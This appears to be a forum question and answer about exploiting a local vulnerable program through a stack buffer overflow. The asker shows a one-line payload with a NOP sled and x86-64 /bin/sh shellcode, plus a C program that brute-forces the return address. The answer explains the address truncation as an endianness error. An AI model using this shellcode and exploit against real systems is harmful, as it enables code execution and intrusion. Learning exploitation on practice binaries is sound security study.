I have an vulnerable program exploitable through the cmdline:
./vuln $(perl -e 'print "\x90"x22'; cat shell; perl -e 'print "\x90"x22';perl -e 'print "\xf4\xdd\xff\xff\xff\x7f"')
����������������������H1��;H1�QH�/bin//shWH��@0����������������������������
$
Now I want to use a C program to be able to brute force the return address, but I'm having an issue while trying to fill the injected buffer (going through a strcpy that is vulnerable so as to overwrite rip).
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
int offset;
char shell[28] = {"\x48\x31\xc0\xb0\x3b\x48\x31\xc9\x51\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\x40\x30\xf6\x0f\x05"};
int main(int argc, char *argv[])
{
int i;
char buffer[78];
offset = atoi(argv[1]);
unsigned long get_sp()
{
__asm__("mov %rsp, %rax");
}
unsigned long ret, rsp;
rsp = get_sp();
ret = rsp + offset;
printf("%lx\n", ret);
for(i=0;i<78;i+=6)
*(buffer+i) = ret; //HERE THE PROBLEM
memset(buffer, '\x90', 22);
strncpy(&buffer[22], shell, strlen(shell));
execl("./vuln","vuln", buffer, NULL);
}
Here is the output, as you may notice the addresse is cut. Can you tell me why?
./exploit 52
7fffffffddf4
����������������������H1��;H1�QH�/bin//shWH��@0�
xxdto read what your program is outputting instead of shell substitution characters is a pretty good start. Remember that the address printed by%lxis interpreted as an ulong and correctly placed in memory by the compiler, the overwrite, on the other hand must be correctly placed according to the endianess, which you are not doing. The implicit cast fromulongtochar*is certainly not taking care of the endianess. But, for a start, you need a way to debug that, so read the output in something likexxdbefore trying to solve the problem.